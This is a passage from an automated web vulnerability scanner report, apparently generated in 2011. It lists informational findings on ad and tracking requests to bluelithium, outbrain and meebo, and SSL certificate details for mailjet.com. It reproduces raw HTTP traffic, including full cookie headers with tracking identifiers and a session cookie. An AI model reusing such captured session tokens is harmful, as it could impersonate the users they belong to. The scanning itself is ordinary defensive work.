Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!-!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!$%00!!#RS!$XpC!1R*F!%`E+!!!!$!?5%!)H`@:!wVd.!%FMM!'lGU!'m1A~~~~~=4jht=6h5P~!$7w.!!%f!!%d(@!3e$^!'/%f!!H<'~)I#R?!ZmB)!(XE3!(Gex~~~~~~=57om=9KYw!!.vL"; liday1=x6!2!N5HGH'pE)d; ih="b!!!!@!'R(Y!!!!#=3rxs!*<[e!!!!#=57p$!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1R*F!!!!#=4jht!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2/j6!!!!#=4qsr!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e$^!!!!$=57om!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=d-=>R8ac=$N5HGH.9Q3<; bh="b!!!#w!!-C,!!!!%=3`c_!!-G2!!!!%=5$1G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!$=57ob!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!]sr!!!!#=57pA!!`4u!!!!#=54Pi!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!x^1!!!!$=5,??!!y)?!!!!#=3*$x!##!)!!!!$=5#lv!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#6]*!!!!$=5#lv!#7wf!!!!#=51w'!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q/x!!!!#=5,(/!#Q]:!!!!#=4YXv!#Q_h!!!!$=3gb9!#QoI!!!!#=5,',!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#T<,!!!!$=5,??!#UD`!!!!$=3**U!#UL(!!!!#=5$1H!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!$=4X0s!#eCK!!!!$=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#qq%!!!!#=4jf'!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#v5N!!!!$=5#lm!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$'.I!!!!$=5$1G!$'.K!!!!#=5$1G!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-`?!!!!#=4jeq!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!)=4_L-!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:jo!!!!%=5,9,!$<DI!!!!#=3G@^!$<Rh!!!!#=5$$X!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 00:54:52 GMT
Pragma: no-cache
Content-Length: 5894
Age: 70
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

29.3. http://ads.bluelithium.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2475049 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:11:55 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:11:55 GMT
Pragma: no-cache
Content-Length: 4574
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

29.4. http://traffic.outbrain.com/network/redir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://traffic.outbrain.com
Path:   /network/redir

Request

GET /network/redir?key=467a26e36b344d031207fb454f356be4&rdid=231534154&type=YLD_def_ch&in-site=true&req_id=da23b34cfa8657c71e50520363d1bbbe&agent=blog_JS_rec&recMode=4&reqType=1&wid=100&imgType=0&refPub=347&prs=false&scp=false&version=42206&idx=0 HTTP/1.1
Host: traffic.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=7a957d2b-640c-464a-8acd-8219f3607c99; tick=1316220942842; _lvs2="7o9zvLIDBgZ/PDZJG4J4VcCxVx+pz+vfyPm975gFPm+3JT8CAr5BQAcO/CD2iJ2OomCz617Au40="; _lvd2="PHPHrMMi4tB/TUzMDhNLuExtgrPUidZw2SkL41O19PL40iJ3cmuxL0CBz/AZPclyarqHKgLRZADwwyrf9Wxp503sC1vv7gThts/kVuXGq+6RePDwdpIv9I9eUye8TAoxesWFaLltsC0="; _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; recs-6a9250000f8bdf31c8744c5bafc327c0="WOCZPPRgUVeQ3XCS2OoI48rf6g9SSjSCZlMhWyZJP/HjJ1nS2BO6WvFWNYQF78qoU+fNRUM+rQBZCc9A1uQeXHxeY8GsogNrScHQXkaR7ugqy2ogff13YSmXftEP5JyF9XVu3bYtlRJ5WOXcO9UcZQ=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: _rcc2=H6lta0Gb5dPegbOhXE7G4uRdkwHPmlC5; Domain=outbrain.com; Expires=Sat, 13-Oct-2012 01:00:13 GMT; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Content-Length: 348
Date: Sat, 17 Sep 2011 01:00:12 GMT

<html>
   <body onload="document.location.replace('http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/')">
       <form method="get" action="h
...[SNIP]...

29.5. http://www.meebo.com/cmd/btproviders  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cmd/btproviders

Request

POST /cmd/btproviders HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=tmz
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=24214e45185d42f41e74; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26pts_bk%3D1315097366590; meebo-cim-session=22f2a4612dbd69e4235a

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 00:51:58 GMT
Connection: keep-alive
Content-Length: 432

[{"url": "http://tags.bluekai.com/site/4195?id={{tcookie}}&", "code": "bk", "sslUrl": "https://stags.bluekai.com/site/4195?id={{tcookie}}&", "interval": 2592000000}, {"url": "http://syndication.mmismm
...[SNIP]...

29.6. http://www.meebo.com/cmd/tc  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cmd/tc

Request

POST /cmd/tc HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=tmz
Content-Length: 60
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=24214e45185d42f41e74; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26pts_bk%3D1315097366590; meebo-cim-session=22f2a4612dbd69e4235a

canopy=true&tc=true&tcookie=b6f4436ac614b0358d75&partner=tmz

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 00:51:58 GMT
Connection: keep-alive
Content-Length: 386

{"stat": "ok", "data": {"tcookie": "b6f4436ac614b0358d75", "canopy": {"enabled": false}, "categories": {"borderless_allowed": "false", "ic22": "1", "ic19": "1", "ic17": "1", "ic16": "1", "ic12": "1",
...[SNIP]...

30. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mailjet.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.mailjet.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Mon Aug 30 16:22:43 CDT 2010
Valid to:  Thu Aug 30 16:22:43 CDT 2012

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Sat Sep 17 12:36:31 CDT 2011.